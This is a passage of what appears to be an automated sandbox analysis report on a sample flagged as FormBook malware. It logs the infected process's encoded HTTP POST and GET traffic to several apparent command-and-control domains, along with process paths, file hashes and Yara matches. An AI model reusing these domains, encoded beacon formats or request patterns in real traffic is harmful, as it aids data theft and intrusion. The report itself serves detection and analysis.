                                                            Data Raw: 67 74 4c 38 50 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 50 42 33 2b 6f 38 65 76 56 59 56 59 72 31 6d 4f 41 42 71 65 4c 66 34 63 6f 64 2b 79 72 69 64 68 50 56 51 51 42 42 46 36 75 4f 49 4a 5a 30 5a 45 68 44 30 49 77 4d 4c 51 4d 4f 4e 56 7a 48 34 52 47 42 5a 30 7a 30 4c 7a 53 39 77 35 55 6f 2b 70 71 67 2f 43 57 70 6b 38 62 37 6e 63 76 64 55 6f 48 4e 61 43 4c 38 59 46 43 4a 59 33 47 34 73 50 41 43 5a 39 45 67 6e 54 78 31 52 54 67 4b 58 61 4c 32 37 6d 69 70 73 66 4a 4f 63 54 4f 44 6a 4e 52 4f 70 32 7a 55 6c 65 6a 57 50 77 4e 38 58 77 31 72 55 38 6d 4c 4f 53 71 67 6c 77 61 79 34 4f 2f 47 2f 58 4b 45 6b 6a 63 4e 66 52 72 79 38 58 59 50 6b 6f 45 69 66 73 45 79 75 48 64 4a 64 30 6d 50 45 4f 4f 64 69 2b 64 7a 6b 4a 6b 6c 54 73 66 4a 64 66 49 33 53 55 45 4b 32 73 45 37 72 71 4f 48 6b 45 6a 68 79 39 30 6c 35 54 32 2f 55 55 4d 68 36 47 54 35 55 53 65 31 51 4f 52 62 77 39 2f 4a 4f 4b 35 32 37 57 62 4f 2b 62 7a 72 37 48 61 4f 65 44 44 78 56 56 6a 4b 69 6f 62 72 77 54 50 46 69 46 47 47 4c 41 65 6f 52 59 50 2b 6e 5a [TRUNCATED]
                                                            Data Ascii: gtL8P=XG0+arhlWzDjPB3+o8evVYVYr1mOABqeLf4cod+yridhPVQQBBF6uOIJZ0ZEhD0IwMLQMONVzH4RGBZ0z0LzS9w5Uo+pqg/CWpk8b7ncvdUoHNaCL8YFCJY3G4sPACZ9EgnTx1RTgKXaL27mipsfJOcTODjNROp2zUlejWPwN8Xw1rU8mLOSqglway4O/G/XKEkjcNfRry8XYPkoEifsEyuHdJd0mPEOOdi+dzkJklTsfJdfI3SUEK2sE7rqOHkEjhy90l5T2/UUMh6GT5USe1QORbw9/JOK527WbO+bzr7HaOeDDxVVjKiobrwTPFiFGGLAeoRYP+nZ3rIV78UUQhnYSSpcSiRx5Ss8VuDGTsvYuySxKP28ECSQUZJaO/z/Ju0RSOkmWm7wGLZL5NW4q5Zn2Xh5SAG27zbvR0gPFGY5Mlk1S+2pydGwlbDlOHRNg+vhPg8lFy5CpKJhziKpypDcG1nOnFI3PgLP3JVRLpisoaPbiSp/Sa4/UqW1jCQJN/t/Z3H62mBAid3ms36ZQu9wZqMcetjTnTH6NUZJYEY9q3+qbiVtnQTkwxBeJfNFNs+e/hx9Ykf+ELOS40Bc3JJa9SChmc7j5u9L1P3aZiiKeefia2Pe20SuNoIBHyR++kiYyNsCGMJ+KJSYCMo+DeKZ1Hrzl7IcWWWLWH3UYh+3e47MJ0pVMx9UG/L6xOTeg9DnfctGZG7HD6fGi8jit+vKxoFti49dpSy2qfRTwo5gU2sLWGpqr36tCDHiUVMZrhMaSIokZC/I/xxDCE1Hqf1OwjGCEgIHKjjrkl9vw9PDwHyUNmC1cZv/7cfZusAuyG0nsybTxUUtYjCrBchL4GFMwcFNQJ0y4iB1s9USi/TYnHSFfUXNblYv0MbJpCOUBvgRdRwYoFjILijSDpCfXtouRZdFsw24/8krWzJzjRjabMywGRhsCCVc2T3L4dUESxhICo9eHnQSgvUrTNiJ/rgbvSmBqmryrRD8tQWxVolCqm [TRUNCATED]
                                                            Jan 10, 2025 22:06:21.321096897 CET533INHTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:21 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.1149729209.74.77.107805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:23.295053959 CET548OUTGET /a6qk/?FZg8n=jDOt606X1jh&gtL8P=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsZd1kcaOBiz2wX9gnM6j3y9U4T6bwB9wKCO8= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.learnwithus.site
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:23.880858898 CET548INHTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:23 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.1149730154.205.156.26805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:29.046247005 CET807OUTPOST /ao44/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.jijievo.site
                                                            Origin: http://www.jijievo.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.jijievo.site/ao44/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 35 4f 4a 2b 36 75 68 56 57 48 2f 4c 78 2b 7a 33 4b 6a 37 4e 4a 43 53 4e 57 44 75 48 53 75 57 6f 31 43 63 39 44 32 75 35 52 64 35 6c 46 68 2f 6f 67 76 65 48 45 63 76 52 73 5a 45 75 59 73 36 42 79 4b 43 69 79 46 58 51 42 36 79 53 52 6e 54 78 69 75 54 53 46 2b 78 4d 4f 50 52 70 59 33 52 53 62 35 32 41 66 6c 63 30 4c 75 55 37 79 7a 31 31 6d 7a 64 39 76 4c 6d 34 79 51 65 53 41 76 43 46 35 72 73 35 42 79 59 46 70 4b 5a 6c 72 4f 37 47 4f 30 55 33 67 43 32 78 64 31 70 69 42 7a 4f 56 2b 59 65 67 70 4e 32 78 46 4e 6e 5a 58 58 76 39 6a 77 44 63 4c 77 3d 3d
                                                            Data Ascii: gtL8P=N+H2SkqD1kU55OJ+6uhVWH/Lx+z3Kj7NJCSNWDuHSuWo1Cc9D2u5Rd5lFh/ogveHEcvRsZEuYs6ByKCiyFXQB6ySRnTxiuTSF+xMOPRpY3RSb52Aflc0LuU7yz11mzd9vLm4yQeSAvCF5rs5ByYFpKZlrO7GO0U3gC2xd1piBzOV+YegpN2xFNnZXXv9jwDcLw==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.1149731154.205.156.26805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:31.822845936 CET827OUTPOST /ao44/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.jijievo.site
                                                            Origin: http://www.jijievo.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.jijievo.site/ao44/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 72 2b 5a 2b 68 4e 35 56 48 33 2f 4d 39 65 7a 33 46 44 37 52 4a 43 65 4e 57 42 66 41 54 63 79 6f 32 67 45 39 41 33 75 35 66 39 35 6c 4b 42 2f 70 2f 2f 65 36 45 63 54 6a 73 59 34 75 59 73 75 42 79 50 2b 69 79 32 2f 54 41 71 7a 30 65 48 54 7a 6d 75 54 53 46 2b 78 4d 4f 50 45 45 59 33 5a 53 62 49 47 41 4e 55 63 33 43 4f 55 34 37 54 31 31 69 7a 64 35 76 4c 6d 47 79 52 43 6f 41 74 71 46 35 75 51 35 42 6a 59 45 6a 4b 5a 5a 6d 75 36 43 4e 78 74 79 73 79 62 38 53 32 4d 58 56 44 57 35 37 65 54 36 35 75 2f 6d 47 65 76 62 44 78 4f 4e 71 42 6d 56 51 35 58 31 63 76 64 50 4c 74 62 41 78 4e 39 56 68 33 37 5a 49 35 67 3d
                                                            Data Ascii: gtL8P=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATcyo2gE9A3u5f95lKB/p//e6EcTjsY4uYsuByP+iy2/TAqz0eHTzmuTSF+xMOPEEY3ZSbIGANUc3COU47T11izd5vLmGyRCoAtqF5uQ5BjYEjKZZmu6CNxtysyb8S2MXVDW57eT65u/mGevbDxONqBmVQ5X1cvdPLtbAxN9Vh37ZI5g=
                                                            Jan 10, 2025 22:06:33.246718884 CET241INHTTP/1.1 200 OK
                                                            Content-Encoding: gzip
                                                            Content-Type: text/html; charset=UTF-8
                                                            Date: Fri, 10 Jan 2025 21:06:32 GMT
                                                            Server: nginx
                                                            Vary: Accept-Encoding
                                                            Content-Length: 44
                                                            Connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                            Data Ascii: KLIU(WHO-QHKM.g


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.1149732154.205.156.26805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:34.387556076 CET1840OUTPOST /ao44/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.jijievo.site
                                                            Origin: http://www.jijievo.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.jijievo.site/ao44/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 72 2b 5a 2b 68 4e 35 56 48 33 2f 4d 39 65 7a 33 46 44 37 52 4a 43 65 4e 57 42 66 41 54 63 36 6f 32 56 59 39 43 51 36 35 63 39 35 6c 55 52 2f 53 2f 2f 65 64 45 59 48 6e 73 59 30 51 59 75 57 42 6f 71 79 69 37 6e 2f 54 4c 71 7a 30 47 33 54 32 69 75 53 53 46 2b 68 49 4f 50 55 45 59 33 5a 53 62 4b 4f 41 61 56 63 33 45 4f 55 37 79 7a 31 48 6d 7a 63 63 76 4c 76 39 79 52 58 58 41 39 4b 46 34 4f 67 35 44 52 77 45 76 4b 5a 68 68 75 36 6b 4e 78 70 35 73 79 48 61 53 32 4a 79 56 42 47 35 36 61 32 69 73 4d 72 75 45 4d 32 73 58 43 2b 5a 32 45 57 33 66 72 58 36 53 66 5a 50 52 71 57 52 35 2b 30 70 31 6e 6a 5a 53 50 55 6d 76 44 38 4a 7a 30 69 6b 43 74 42 4e 70 45 44 4b 73 76 62 79 38 5a 48 76 55 6b 79 6e 39 59 6e 6e 38 69 54 73 43 61 61 4b 44 68 70 4c 62 66 4b 54 66 6a 65 6d 6b 42 6a 76 4b 65 79 6e 6a 72 5a 34 68 61 38 54 6b 67 71 6e 68 66 36 6e 6a 6e 73 61 77 62 63 77 76 63 73 51 48 77 30 51 6a 37 2b 6d 71 6c 6d 37 4b 66 31 5a 76 32 57 69 46 43 4a 45 4e 70 38 45 [TRUNCATED]
                                                            Data Ascii: gtL8P=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATc6o2VY9CQ65c95lUR/S//edEYHnsY0QYuWBoqyi7n/TLqz0G3T2iuSSF+hIOPUEY3ZSbKOAaVc3EOU7yz1HmzccvLv9yRXXA9KF4Og5DRwEvKZhhu6kNxp5syHaS2JyVBG56a2isMruEM2sXC+Z2EW3frX6SfZPRqWR5+0p1njZSPUmvD8Jz0ikCtBNpEDKsvby8ZHvUkyn9Ynn8iTsCaaKDhpLbfKTfjemkBjvKeynjrZ4ha8Tkgqnhf6njnsawbcwvcsQHw0Qj7+mqlm7Kf1Zv2WiFCJENp8EukDp3AaMAxlXMEG3e59inJ1JRWffa/nkRybyQW8RikF9M3MXmI3m+RiZVy7JqUVApG6GQPai5YK2pQiXp6xzR79/2vJd+wIYrI/+vVjALbDmp0IcU96E3qST4YCBWKk7i7YA8N85ld4UfNsaxTTUXk/PHa21gPIeTbeaomHxXmIogtAyZSAtCJQTYcFhKjEIHU1vhmM8r75Lbas5lSEYXk082uhep1gySoj3DPQK4xXCfzjEljROqwhGHsG0/hPaxjP16Q6P0vFUeV5S1Njex6ncZhlUpvpww99Nuxem79t/AKUK+0cIkuj+I8TZ2F9GZwOhIp2MfJjy3LmiBYCwVwOMuiKqTMJw0WsLtSdTXbMzm3qiiTDU8xwQjb6imxV8jBneHlGRcq29a8FPLvwbSgnlHJxrvlGE5ZPUb8D+w8cCpDADFR7nbII8bw4VawK53semb9eot4bgn8S3w862aYDJzN7nFZS63fdF/LgKCgQN9bL4ID5GgDwKe/a1RbQhGqkVi2qDTeQnfx5BaehXai7tRZqEjxO8ki8lsOtSzZGEYq1V5X8uj+gwAkUyGeT5fyFt2NH2rYRKpMZW98ZTeAKnHLwiNjYfVkgVECrQhZ75dCyqZuPfblPrLw12Ogu5c/UnGF7uGjplSZrIqI/xkXNGQ6lgANHghP [TRUNCATED]
                                                            Jan 10, 2025 22:06:35.903554916 CET241INHTTP/1.1 200 OK
                                                            Content-Encoding: gzip
                                                            Content-Type: text/html; charset=UTF-8
                                                            Date: Fri, 10 Jan 2025 21:06:35 GMT
                                                            Server: nginx
                                                            Vary: Accept-Encoding
                                                            Content-Length: 44
                                                            Connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                            Data Ascii: KLIU(WHO-QHKM.g


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.1149733154.205.156.26805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:36.938612938 CET544OUTGET /ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.jijievo.site
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:38.397444963 CET197INHTTP/1.1 200 OK
                                                            Content-Type: text/html; charset=UTF-8
                                                            Date: Fri, 10 Jan 2025 21:06:38 GMT
                                                            Server: nginx
                                                            Vary: Accept-Encoding
                                                            Content-Length: 24
                                                            Connection: close
                                                            Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                            Data Ascii: Unable to get connection


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.11497343.33.130.190805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:43.511842012 CET831OUTPOST /nqht/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.likesharecomment.net
                                                            Origin: http://www.likesharecomment.net
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.likesharecomment.net/nqht/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 36 34 54 75 6b 6f 45 43 55 6d 49 41 2f 62 52 44 34 4e 2f 36 5a 62 2b 42 33 39 32 2b 41 4c 6d 78 67 58 46 47 73 77 35 35 36 76 6e 48 59 76 49 6f 37 72 74 34 51 53 58 64 67 51 69 62 50 51 45 75 4e 61 52 6f 75 56 2b 36 6c 6a 47 54 79 70 59 6a 4c 57 32 61 47 52 51 70 67 50 37 4a 52 57 78 41 73 6a 6b 64 7a 52 2f 4e 68 58 76 45 65 75 7a 79 32 6c 70 73 6b 50 6f 78 53 46 55 45 6d 4d 6e 6a 35 55 53 31 43 7a 56 6e 6c 69 39 39 6a 68 4c 36 39 6c 33 56 6b 6b 2f 42 78 47 45 50 4f 4f 38 78 38 45 5a 6d 30 4c 4d 6e 34 68 76 38 30 4b 41 57 74 73 54 68 32 67 4b 43 50 69 49 4a 53 6f 70 72 47 51 3d 3d
                                                            Data Ascii: gtL8P=64TukoECUmIA/bRD4N/6Zb+B392+ALmxgXFGsw556vnHYvIo7rt4QSXdgQibPQEuNaRouV+6ljGTypYjLW2aGRQpgP7JRWxAsjkdzR/NhXvEeuzy2lpskPoxSFUEmMnj5US1CzVnli99jhL69l3Vkk/BxGEPOO8x8EZm0LMn4hv80KAWtsTh2gKCPiIJSoprGQ==
                                                            Jan 10, 2025 22:06:43.968492985 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            18192.168.2.11497353.33.130.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:46.426377058 CET851OUTPOST /nqht/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.likesharecomment.net
                                                            Origin: http://www.likesharecomment.net
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.likesharecomment.net/nqht/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 36 34 54 75 6b 6f 45 43 55 6d 49 41 38 37 68 44 30 4f 48 36 52 62 2b 41 72 4e 32 2b 62 62 6d 31 67 58 5a 47 73 78 4d 2b 36 63 44 48 5a 4c 4d 6f 36 71 74 34 58 53 58 64 34 67 69 55 43 77 45 78 4e 61 4d 58 75 51 47 36 6c 6a 43 54 79 74 49 6a 4c 46 65 5a 48 42 51 72 6f 76 37 48 56 57 78 41 73 6a 6b 64 7a 51 61 6d 68 54 44 45 65 2b 6a 79 32 45 70 6a 73 76 6f 79 52 46 55 45 69 4d 6e 2f 35 55 53 44 43 32 4d 4d 6c 67 31 39 6a 68 37 36 36 77 62 57 75 6b 2f 62 2f 6d 45 5a 44 50 56 46 33 6c 4d 56 2f 37 55 78 32 77 6a 65 38 73 4e 4d 39 50 61 32 31 7a 43 41 62 45 70 35 62 5a 4d 69 64 63 6d 50 66 34 50 78 4d 4b 68 6e 31 6a 55 42 51 35 65 6a 6a 4c 38 3d
                                                            Data Ascii: gtL8P=64TukoECUmIA87hD0OH6Rb+ArN2+bbm1gXZGsxM+6cDHZLMo6qt4XSXd4giUCwExNaMXuQG6ljCTytIjLFeZHBQrov7HVWxAsjkdzQamhTDEe+jy2EpjsvoyRFUEiMn/5USDC2MMlg19jh766wbWuk/b/mEZDPVF3lMV/7Ux2wje8sNM9Pa21zCAbEp5bZMidcmPf4PxMKhn1jUBQ5ejjL8=
                                                            Jan 10, 2025 22:06:46.874176979 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:16:03:37
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\0Wu31IhwGO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\0Wu31IhwGO.exe"
                                                            Imagebase:0x7c0000
                                                            File size:886'272 bytes
                                                            MD5 hash:92AF2B53955341AF234B93FF7A4DE5C6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:16:04:03
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\0Wu31IhwGO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\0Wu31IhwGO.exe"
                                                            Imagebase:0x840000
                                                            File size:886'272 bytes
                                                            MD5 hash:92AF2B53955341AF234B93FF7A4DE5C6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:16:04:59
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe"
                                                            Imagebase:0x8f0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:8
                                                            Start time:16:05:02
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\tzutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                            Imagebase:0x680000
                                                            File size:48'640 bytes
